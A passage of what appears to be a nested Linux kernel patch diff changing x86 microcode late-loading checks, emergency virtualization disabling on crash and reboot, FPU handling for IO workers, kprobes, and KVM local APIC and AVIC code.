++	curr_info->cpuid_level = cpuid_eax(0);
++
++	/* Copy all capability leafs and pick up the synthetic ones. */
++	memcpy(&curr_info->x86_capability, &boot_cpu_data.x86_capability,
++	       sizeof(curr_info->x86_capability));
++
++	/* Get the hardware CPUID leafs */
++	get_cpu_cap(curr_info);
++}
++
++/**
++ * microcode_check() - Check if any CPU capabilities changed after an update.
++ * @prev_info:	CPU capabilities stored before an update.
++ *
+  * The microcode loader calls this upon late microcode load to recheck features,
+  * only when microcode has been updated. Caller holds microcode_mutex and CPU
+  * hotplug lock.
++ *
++ * Return: None
+  */
+-void microcode_check(void)
++void microcode_check(struct cpuinfo_x86 *prev_info)
+ {
+-	struct cpuinfo_x86 info;
++	struct cpuinfo_x86 curr_info;
+ 
+ 	perf_check_microcode();
+ 
+-	/* Reload CPUID max function as it might've changed. */
+-	info.cpuid_level = cpuid_eax(0);
+-
+-	/*
+-	 * Copy all capability leafs to pick up the synthetic ones so that
+-	 * memcmp() below doesn't fail on that. The ones coming from CPUID will
+-	 * get overwritten in get_cpu_cap().
+-	 */
+-	memcpy(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability));
+-
+-	get_cpu_cap(&info);
++	store_cpu_caps(&curr_info);
+ 
+-	if (!memcmp(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability)))
++	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,
++		    sizeof(prev_info->x86_capability)))
+ 		return;
+ 
+ 	pr_warn("x86/CPU: CPU features have changed after loading microcode, but might not take effect.\n");
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 56471f750762a..ac59783e6e9f6 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -55,7 +55,9 @@ struct cont_desc {
+ };
+ 
+ static u32 ucode_new_rev;
+-static u8 amd_ucode_patch[PATCH_MAX_SIZE];
++
++/* One blob per node. */
++static u8 amd_ucode_patch[MAX_NUMNODES][PATCH_MAX_SIZE];
+ 
+ /*
+  * Microcode patch container file is prepended to the initrd in cpio
+@@ -428,7 +430,7 @@ apply_microcode_early_amd(u32 cpuid_1_eax, void *ucode, size_t size, bool save_p
+ 	patch	= (u8 (*)[PATCH_MAX_SIZE])__pa_nodebug(&amd_ucode_patch);
+ #else
+ 	new_rev = &ucode_new_rev;
+-	patch	= &amd_ucode_patch;
++	patch	= &amd_ucode_patch[0];
+ #endif
+ 
+ 	desc.cpuid_1_eax = cpuid_1_eax;
+@@ -553,8 +555,7 @@ void load_ucode_amd_ap(unsigned int cpuid_1_eax)
+ 	apply_microcode_early_amd(cpuid_1_eax, cp.data, cp.size, false);
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size);
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size);
+ 
+ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ {
+@@ -572,19 +573,19 @@ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ 	if (!desc.mc)
+ 		return -EINVAL;
+ 
+-	ret = load_microcode_amd(true, x86_family(cpuid_1_eax), desc.data, desc.size);
++	ret = load_microcode_amd(x86_family(cpuid_1_eax), desc.data, desc.size);
+ 	if (ret > UCODE_UPDATED)
+ 		return -EINVAL;
+ 
+ 	return 0;
+ }
+ 
+-void reload_ucode_amd(void)
++void reload_ucode_amd(unsigned int cpu)
+ {
+-	struct microcode_amd *mc;
+ 	u32 rev, dummy __always_unused;
++	struct microcode_amd *mc;
+ 
+-	mc = (struct microcode_amd *)amd_ucode_patch;
++	mc = (struct microcode_amd *)amd_ucode_patch[cpu_to_node(cpu)];
+ 
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+@@ -850,9 +851,10 @@ static enum ucode_state __load_microcode_amd(u8 family, const u8 *data,
+ 	return UCODE_OK;
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size)
+ {
++	struct cpuinfo_x86 *c;
++	unsigned int nid, cpu;
+ 	struct ucode_patch *p;
+ 	enum ucode_state ret;
+ 
+@@ -865,22 +867,22 @@ load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
+ 		return ret;
+ 	}
+ 
+-	p = find_patch(0);
+-	if (!p) {
+-		return ret;
+-	} else {
+-		if (boot_cpu_data.microcode >= p->patch_id)
+-			return ret;
++	for_each_node(nid) {
++		cpu = cpumask_first(cpumask_of_node(nid));
++		c = &cpu_data(cpu);
+ 
+-		ret = UCODE_NEW;
+-	}
++		p = find_patch(cpu);
++		if (!p)
++			continue;
+ 
+-	/* save BSP's matching patch for early load */
+-	if (!save)
+-		return ret;
++		if (c->microcode >= p->patch_id)
++			continue;
++
++		ret = UCODE_NEW;
+ 
+-	memset(amd_ucode_patch, 0, PATCH_MAX_SIZE);
+-	memcpy(amd_ucode_patch, p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++		memset(&amd_ucode_patch[nid], 0, PATCH_MAX_SIZE);
++		memcpy(&amd_ucode_patch[nid], p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++	}
+ 
+ 	return ret;
+ }
+@@ -905,14 +907,9 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device)
+ {
+ 	char fw_name[36] = "amd-ucode/microcode_amd.bin";
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+-	bool bsp = c->cpu_index == boot_cpu_data.cpu_index;
+ 	enum ucode_state ret = UCODE_NFOUND;
+ 	const struct firmware *fw;
+ 
+-	/* reload ucode container only on the boot cpu */
+-	if (!bsp)
+-		return UCODE_OK;
+-
+ 	if (c->x86 >= 0x15)
+ 		snprintf(fw_name, sizeof(fw_name), "amd-ucode/microcode_amd_fam%.2xh.bin", c->x86);
+ 
+@@ -925,7 +922,7 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device)
+ 	if (!verify_container(fw->data, fw->size, false))
+ 		goto fw_release;
+ 
+-	ret = load_microcode_amd(bsp, c->x86, fw->data, fw->size);
++	ret = load_microcode_amd(c->x86, fw->data, fw->size);
+ 
+  fw_release:
+ 	release_firmware(fw);
+diff --git a/arch/x86/kernel/cpu/microcode/core.c b/arch/x86/kernel/cpu/microcode/core.c
+index 712aafff96e03..7487518dc2eb0 100644
+--- a/arch/x86/kernel/cpu/microcode/core.c
++++ b/arch/x86/kernel/cpu/microcode/core.c
+@@ -298,7 +298,7 @@ struct cpio_data find_microcode_in_initrd(const char *path, bool use_pa)
+ #endif
+ }
+ 
+-void reload_early_microcode(void)
++void reload_early_microcode(unsigned int cpu)
+ {
+ 	int vendor, family;
+ 
+@@ -312,7 +312,7 @@ void reload_early_microcode(void)
+ 		break;
+ 	case X86_VENDOR_AMD:
+ 		if (family >= 0x10)
+-			reload_ucode_amd();
++			reload_ucode_amd(cpu);
+ 		break;
+ 	default:
+ 		break;
+@@ -438,6 +438,7 @@ wait_for_siblings:
+ static int microcode_reload_late(void)
+ {
+ 	int old = boot_cpu_data.microcode, ret;
++	struct cpuinfo_x86 prev_info;
+ 
+ 	pr_err("Attempting late microcode loading - it is dangerous and taints the kernel.\n");
+ 	pr_err("You should switch to early loading, if possible.\n");
+@@ -445,12 +446,21 @@ static int microcode_reload_late(void)
+ 	atomic_set(&late_cpus_in,  0);
+ 	atomic_set(&late_cpus_out, 0);
+ 
+-	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
+-	if (ret == 0)
+-		microcode_check();
++	/*
++	 * Take a snapshot before the microcode update in order to compare and
++	 * check whether any bits changed after an update.
++	 */
++	store_cpu_caps(&prev_info);
+ 
+-	pr_info("Reload completed, microcode revision: 0x%x -> 0x%x\n",
+-		old, boot_cpu_data.microcode);
++	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
++	if (!ret) {
++		pr_info("Reload succeeded, microcode revision: 0x%x -> 0x%x\n",
++			old, boot_cpu_data.microcode);
++		microcode_check(&prev_info);
++	} else {
++		pr_info("Reload failed, current microcode revision: 0x%x\n",
++			boot_cpu_data.microcode);
++	}
+ 
+ 	return ret;
+ }
+@@ -557,7 +567,7 @@ void microcode_bsp_resume(void)
+ 	if (uci->mc)
+ 		microcode_ops->apply_microcode(cpu);
+ 	else
+-		reload_early_microcode();
++		reload_early_microcode(cpu);
+ }
+ 
+ static struct syscore_ops mc_syscore_ops = {
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 305514431f26e..cdd92ab43cda4 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -37,7 +37,6 @@
+ #include <linux/kdebug.h>
+ #include <asm/cpu.h>
+ #include <asm/reboot.h>
+-#include <asm/virtext.h>
+ #include <asm/intel_pt.h>
+ #include <asm/crash.h>
+ #include <asm/cmdline.h>
+@@ -81,15 +80,6 @@ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Disable VMX or SVM if needed.
+-	 *
+-	 * We need to disable virtualization on all CPUs.
+-	 * Having VMX or SVM enabled on any CPU may break rebooting
+-	 * after the kdump kernel has finished its task.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -148,12 +138,7 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Booting kdump kernel with VMX or SVM enabled won't work,
+-	 * because (among other limitations) we can't disable paging
+-	 * with the virt flags.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
++	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 958accf2ccf07..9fcfa5c4dad79 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -57,7 +57,7 @@ static inline void fpregs_restore_userregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int cpu = smp_processor_id();
+ 
+-	if (WARN_ON_ONCE(current->flags & PF_KTHREAD))
++	if (WARN_ON_ONCE(current->flags & (PF_KTHREAD | PF_IO_WORKER)))
+ 		return;
+ 
+ 	if (!fpregs_state_valid(fpu, cpu)) {
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 9baa89a8877d0..caf33486dc5ee 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -426,7 +426,7 @@ void kernel_fpu_begin_mask(unsigned int kfpu_mask)
+ 
+ 	this_cpu_write(in_kernel_fpu, true);
+ 
+-	if (!(current->flags & PF_KTHREAD) &&
++	if (!(current->flags & (PF_KTHREAD | PF_IO_WORKER)) &&
+ 	    !test_thread_flag(TIF_NEED_FPU_LOAD)) {
+ 		set_thread_flag(TIF_NEED_FPU_LOAD);
+ 		save_fpregs_to_fpstate(&current->thread.fpu);
+@@ -853,12 +853,12 @@ int fpu__exception_code(struct fpu *fpu, int trap_nr)
+  * Initialize register state that may prevent from entering low-power idle.
+  * This function will be invoked from the cpuidle driver only when needed.
+  */
+-void fpu_idle_fpregs(void)
++noinstr void fpu_idle_fpregs(void)
+ {
+ 	/* Note: AMX_TILE being enabled implies XGETBV1 support */
+ 	if (cpu_feature_enabled(X86_FEATURE_AMX_TILE) &&
+ 	    (xfeatures_in_use() & XFEATURE_MASK_XTILE)) {
+ 		tile_release();
+-		fpregs_deactivate(&current->thread.fpu);
++		__this_cpu_write(fpu_fpregs_owner_ctx, NULL);
+ 	}
+ }
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e57e07b0edb64..57b0037d0a996 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -46,8 +46,8 @@ unsigned long __recover_optprobed_insn(kprobe_opcode_t *buf, unsigned long addr)
+ 		/* This function only handles jump-optimized kprobe */
+ 		if (kp && kprobe_optimized(kp)) {
+ 			op = container_of(kp, struct optimized_kprobe, kp);
+-			/* If op->list is not empty, op is under optimizing */
+-			if (list_empty(&op->list))
++			/* If op is optimized or under unoptimizing */
++			if (list_empty(&op->list) || optprobe_queued_unopt(op))
+ 				goto found;
+ 		}
+ 	}
+@@ -353,7 +353,7 @@ int arch_check_optimized_kprobe(struct optimized_kprobe *op)
+ 
+ 	for (i = 1; i < op->optinsn.size; i++) {
+ 		p = get_kprobe(op->kp.addr + i);
+-		if (p && !kprobe_disabled(p))
++		if (p && !kprobe_disarmed(p))
+ 			return -EEXIST;
+ 	}
+ 
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index c3636ea4aa71f..d03c551defccf 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -528,33 +528,29 @@ static inline void kb_wait(void)
+ 	}
+ }
+ 
+-static void vmxoff_nmi(int cpu, struct pt_regs *regs)
+-{
+-	cpu_emergency_vmxoff();
+-}
++static inline void nmi_shootdown_cpus_on_restart(void);
+ 
+-/* Use NMIs as IPIs to tell all CPUs to disable virtualization */
+-static void emergency_vmx_disable_all(void)
++static void emergency_reboot_disable_virtualization(void)
+ {
+ 	/* Just make sure we won't change CPUs while doing this */
+ 	local_irq_disable();
+ 
+ 	/*
+-	 * Disable VMX on all CPUs before rebooting, otherwise we risk hanging
+-	 * the machine, because the CPU blocks INIT when it's in VMX root.
++	 * Disable virtualization on all CPUs before rebooting to avoid hanging
++	 * the system, as VMX and SVM block INIT when running in the host.
+ 	 *
+ 	 * We can't take any locks and we may be on an inconsistent state, so
+-	 * use NMIs as IPIs to tell the other CPUs to exit VMX root and halt.
++	 * use NMIs as IPIs to tell the other CPUs to disable VMX/SVM and halt.
+ 	 *
+-	 * Do the NMI shootdown even if VMX if off on _this_ CPU, as that
+-	 * doesn't prevent a different CPU from being in VMX root operation.
++	 * Do the NMI shootdown even if virtualization is off on _this_ CPU, as
++	 * other CPUs may have virtualization enabled.
+ 	 */
+-	if (cpu_has_vmx()) {
+-		/* Safely force _this_ CPU out of VMX root operation. */
+-		__cpu_emergency_vmxoff();
++	if (cpu_has_vmx() || cpu_has_svm(NULL)) {
++		/* Safely force _this_ CPU out of VMX/SVM operation. */
++		cpu_emergency_disable_virtualization();
+ 
+-		/* Halt and exit VMX root operation on the other CPUs. */
+-		nmi_shootdown_cpus(vmxoff_nmi);
++		/* Disable VMX/SVM and halt on other CPUs. */
++		nmi_shootdown_cpus_on_restart();
+ 	}
+ }
+ 
+@@ -590,7 +586,7 @@ static void native_machine_emergency_restart(void)
+ 	unsigned short mode;
+ 
+ 	if (reboot_emergency)
+-		emergency_vmx_disable_all();
++		emergency_reboot_disable_virtualization();
+ 
+ 	tboot_shutdown(TB_SHUTDOWN_REBOOT);
+ 
+@@ -795,6 +791,17 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+ 
++/*
++ * Disable virtualization, i.e. VMX or SVM, to ensure INIT is recognized during
++ * reboot.  VMX blocks INIT if the CPU is post-VMXON, and SVM blocks INIT if
++ * GIF=0, i.e. if the crash occurred between CLGI and STGI.
++ */
++void cpu_emergency_disable_virtualization(void)
++{
++	cpu_emergency_vmxoff();
++	cpu_emergency_svm_disable();
++}
++
+ #if defined(CONFIG_SMP)
+ 
+ static nmi_shootdown_cb shootdown_callback;
+@@ -817,7 +824,14 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 		return NMI_HANDLED;
+ 	local_irq_disable();
+ 
+-	shootdown_callback(cpu, regs);
++	if (shootdown_callback)
++		shootdown_callback(cpu, regs);
++
++	/*
++	 * Prepare the CPU for reboot _after_ invoking the callback so that the
++	 * callback can safely use virtualization instructions, e.g. VMCLEAR.
++	 */
++	cpu_emergency_disable_virtualization();
+ 
+ 	atomic_dec(&waiting_for_crash_ipi);
+ 	/* Assume hlt works */
+@@ -828,18 +842,32 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	return NMI_HANDLED;
+ }
+ 
+-/*
+- * Halt all other CPUs, calling the specified function on each of them
++/**
++ * nmi_shootdown_cpus - Stop other CPUs via NMI
++ * @callback:	Optional callback to be invoked from the NMI handler
++ *
++ * The NMI handler on the remote CPUs invokes @callback, if not
++ * NULL, first and then disables virtualization to ensure that
++ * INIT is recognized during reboot.
+  *
+- * This function can be used to halt all other CPUs on crash
+- * or emergency reboot time. The function passed as parameter
+- * will be called inside a NMI handler on all CPUs.
++ * nmi_shootdown_cpus() can only be invoked once. After the first
++ * invocation all other CPUs are stuck in crash_nmi_callback() and
++ * cannot respond to a second NMI.
+  */
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ {
+ 	unsigned long msecs;
++
+ 	local_irq_disable();
+ 
++	/*
++	 * Avoid certain doom if a shootdown already occurred; re-registering
++	 * the NMI handler will cause list corruption, modifying the callback
++	 * will do who knows what, etc...
++	 */
++	if (WARN_ON_ONCE(crash_ipi_issued))
++		return;
++
+ 	/* Make a note of crashing cpu. Will be used in NMI callback. */
+ 	crashing_cpu = safe_smp_processor_id();
+ 
+@@ -867,7 +895,17 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 		msecs--;
+ 	}
+ 
+-	/* Leave the nmi callback set */
++	/*
++	 * Leave the nmi callback set, shootdown is a one-time thing.  Clearing
++	 * the callback could result in a NULL pointer dereference if a CPU
++	 * (finally) responds after the timeout expires.
++	 */
++}
++
++static inline void nmi_shootdown_cpus_on_restart(void)
++{
++	if (!crash_ipi_issued)
++		nmi_shootdown_cpus(NULL);
+ }
+ 
+ /*
+@@ -897,6 +935,8 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 	/* No other CPUs to shoot down */
+ }
+ 
++static inline void nmi_shootdown_cpus_on_restart(void) { }
++
+ void run_crash_ipi_callback(struct pt_regs *regs)
+ {
+ }
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 1504eb8d25aa6..004cb30b74198 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -360,7 +360,7 @@ static bool strict_sigaltstack_size __ro_after_init = false;
+ 
+ static int __init strict_sas_size(char *arg)
+ {
+-	return kstrtobool(arg, &strict_sigaltstack_size);
++	return kstrtobool(arg, &strict_sigaltstack_size) == 0;
+ }
+ __setup("strict_sas_size", strict_sas_size);
+ 
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 06db901fabe8e..375b33ecafa27 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -32,7 +32,7 @@
+ #include <asm/mce.h>
+ #include <asm/trace/irq_vectors.h>
+ #include <asm/kexec.h>
+-#include <asm/virtext.h>
++#include <asm/reboot.h>
+ 
+ /*
+  *	Some notes on x86 processor bugs affecting SMP operation:
+@@ -122,7 +122,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	if (raw_smp_processor_id() == atomic_read(&stopping_cpu))
+ 		return NMI_HANDLED;
+ 
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ 
+ 	return NMI_HANDLED;
+@@ -134,7 +134,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ DEFINE_IDTENTRY_SYSVEC(sysvec_reboot)
+ {
+ 	ack_APIC_irq();
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ }
+ 
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 4efdb4a4d72c6..7f0c02b5dfdd4 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2072,10 +2072,18 @@ static void kvm_lapic_xapic_id_updated(struct kvm_lapic *apic)
+ {
+ 	struct kvm *kvm = apic->vcpu->kvm;
+ 
++	if (!kvm_apic_hw_enabled(apic))
++		return;
++
+ 	if (KVM_BUG_ON(apic_x2apic_mode(apic), kvm))
+ 		return;
+ 
+-	if (kvm_xapic_id(apic) == apic->vcpu->vcpu_id)
++	/*
++	 * Deliberately truncate the vCPU ID when detecting a modified APIC ID
++	 * to avoid false positives if the vCPU ID, i.e. x2APIC ID, is a 32-bit
++	 * value.
++	 */
++	if (kvm_xapic_id(apic) == (u8)apic->vcpu->vcpu_id)
+ 		return;
+ 
+ 	kvm_set_apicv_inhibit(apic->vcpu->kvm, APICV_INHIBIT_REASON_APIC_ID_MODIFIED);
+@@ -2219,10 +2227,14 @@ static int kvm_lapic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val)
+ 		break;
+ 
+ 	case APIC_SELF_IPI:
+-		if (apic_x2apic_mode(apic))
+-			kvm_apic_send_ipi(apic, APIC_DEST_SELF | (val & APIC_VECTOR_MASK), 0);
+-		else
++		/*
++		 * Self-IPI exists only when x2APIC is enabled.  Bits 7:0 hold
++		 * the vector, everything else is reserved.
++		 */
++		if (!apic_x2apic_mode(apic) || (val & ~APIC_VECTOR_MASK))
+ 			ret = 1;
++		else
++			kvm_apic_send_ipi(apic, APIC_DEST_SELF | val, 0);
+ 		break;
+ 	default:
+ 		ret = 1;
+@@ -2284,23 +2296,18 @@ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	u64 val;
+ 
+-	if (apic_x2apic_mode(apic)) {
+-		if (KVM_BUG_ON(kvm_lapic_msr_read(apic, offset, &val), vcpu->kvm))
+-			return;
+-	} else {
+-		val = kvm_lapic_get_reg(apic, offset);
+-	}
+-
+ 	/*
+ 	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+ 	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+ 	 * to get the upper half from ICR2.
+ 	 */
+ 	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
++		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+ 		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+ 		trace_kvm_apic_write(APIC_ICR, val);
+ 	} else {
+ 		/* TODO: optimize to just emulate side effect w/o one more write */
++		val = kvm_lapic_get_reg(apic, offset);
+ 		kvm_lapic_reg_write(apic, offset, (u32)val);
+ 	}
+ }
+@@ -2429,6 +2436,7 @@ void kvm_apic_update_apicv(struct kvm_vcpu *vcpu)
+ 		 */
+ 		apic->isr_count = count_vectors(apic->regs + APIC_ISR);
+ 	}
++	apic->highest_isr_cache = -1;
+ }
+ 
+ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+@@ -2484,7 +2492,6 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 		kvm_lapic_set_reg(apic, APIC_TMR + 0x10 * i, 0);
+ 	}
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	update_divide_count(apic);
+ 	atomic_set(&apic->lapic_timer.pending, 0);
+ 
+@@ -2772,7 +2779,6 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	__start_apic_timer(apic, APIC_TMCCT);
+ 	kvm_lapic_set_reg(apic, APIC_TMCCT, 0);
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	if (apic->apicv_active) {
+ 		static_call_cond(kvm_x86_apicv_post_state_restore)(vcpu);
+ 		static_call_cond(kvm_x86_hwapic_irr_update)(vcpu, apic_find_highest_irr(apic));
+@@ -2943,13 +2949,17 @@ static int kvm_lapic_msr_read(struct kvm_lapic *apic, u32 reg, u64 *data)
+ static int kvm_lapic_msr_write(struct kvm_lapic *apic, u32 reg, u64 data)
+ {
+ 	/*
+-	 * ICR is a 64-bit register in x2APIC mode (and Hyper'v PV vAPIC) and
++	 * ICR is a 64-bit register in x2APIC mode (and Hyper-V PV vAPIC) and
+ 	 * can be written as such, all other registers remain accessible only
+ 	 * through 32-bit reads/writes.
+ 	 */
+ 	if (reg == APIC_ICR)
+ 		return kvm_x2apic_icr_write(apic, data);
+ 
++	/* Bits 63:32 are reserved in all other registers. */
++	if (data >> 32)
++		return 1;
++
+ 	return kvm_lapic_reg_write(apic, reg, (u32)data);
+ }
+ 
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 6919dee69f182..97ad0661f9639 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -86,6 +86,12 @@ static void avic_activate_vmcb(struct vcpu_svm *svm)
+ 		/* Disabling MSR intercept for x2APIC registers */
+ 		svm_set_x2apic_msr_interception(svm, false);
+ 	} else {
++		/*
++		 * Flush the TLB, the guest may have inserted a non-APIC
++		 * mapping into the TLB while AVIC was disabled.
++		 */
++		kvm_make_request(KVM_REQ_TLB_FLUSH_CURRENT, &svm->vcpu);
++
+ 		/* For xAVIC and hybrid-xAVIC modes */
+ 		vmcb->control.avic_physical_id |= AVIC_MAX_PHYSICAL_ID;
+ 		/* Enabling MSR intercept for x2APIC registers */
+@@ -496,14 +502,18 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	trace_kvm_avic_incomplete_ipi(vcpu->vcpu_id, icrh, icrl, id, index);
+ 
+ 	switch (id) {
++	case AVIC_IPI_FAILURE_INVALID_TARGET:
+ 	case AVIC_IPI_FAILURE_INVALID_INT_TYPE:
+ 		/*
+ 		 * Emulate IPIs that are not handled by AVIC hardware, which
+-		 * only virtualizes Fixed, Edge-Triggered INTRs.  The exit is
+-		 * a trap, e.g. ICR holds the correct value and RIP has been
+-		 * advanced, KVM is responsible only for emulating the IPI.
+-		 * Sadly, hardware may sometimes leave the BUSY flag set, in
+-		 * which case KVM needs to emulate the ICR write as well in
++		 * only virtualizes Fixed, Edge-Triggered INTRs, and falls over
++		 * if _any_ targets are invalid, e.g. if the logical mode mask
++		 * is a superset of running vCPUs.
++		 *
++		 * The exit is a trap, e.g. ICR holds the correct value and RIP
++		 * has been advanced, KVM is responsible only for emulating the
++		 * IPI.  Sadly, hardware may sometimes leave the BUSY flag set,
++		 * in which case KVM needs to emulate the ICR write as well in
+ 		 * order to clear the BUSY flag.
+ 		 */
+ 		if (icrl & APIC_ICR_BUSY)
+@@ -519,8 +529,6 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 		 */
+ 		avic_kick_target_vcpus(vcpu->kvm, apic, icrl, icrh, index);
+ 		break;
+-	case AVIC_IPI_FAILURE_INVALID_TARGET:
+-		break;
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
+@@ -739,18 +747,6 @@ void avic_apicv_post_state_restore(struct kvm_vcpu *vcpu)
+ 	avic_handle_ldr_update(vcpu);
+ }
+ 
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu)
+-{
+-	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
+-		return;
+-
+-	if (kvm_get_apic_mode(vcpu) == LAPIC_MODE_INVALID) {
+-		WARN_ONCE(true, "Invalid local APIC state (vcpu_id=%d)", vcpu->vcpu_id);
+-		return;
+-	}
+-	avic_refresh_apicv_exec_ctrl(vcpu);
+-}
+-
+ static int avic_set_pi_irte_mode(struct kvm_vcpu *vcpu, bool activate)
+ {
+ 	int ret = 0;
+@@ -1092,17 +1088,18 @@ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ }
+ 
+-
+-void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 	struct vmcb *vmcb = svm->vmcb01.ptr;
+-	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
++		return;
+ 
+ 	if (!enable_apicv)
+ 		return;
+ 
+-	if (activated) {
++	if (kvm_vcpu_apicv_active(vcpu)) {
+ 		/**
+ 		 * During AVIC temporary deactivation, guest could update
+ 		 * APIC ID, DFR and LDR registers, which would not be trapped
+@@ -1116,6 +1113,16 @@ void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
+ 		avic_deactivate_vmcb(svm);
+ 	}
+ 	vmcb_mark_dirty(vmcb, VMCB_AVIC);
++}
++
++void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++{
++	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!enable_apicv)
++		return;
++
++	avic_refresh_virtual_apic_mode(vcpu);
+ 
+ 	if (activated)
+ 		avic_vcpu_load(vcpu, vcpu->cpu);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 86d6897f48068..579038eee94a3 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1293,7 +1293,7 @@ static int sev_send_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
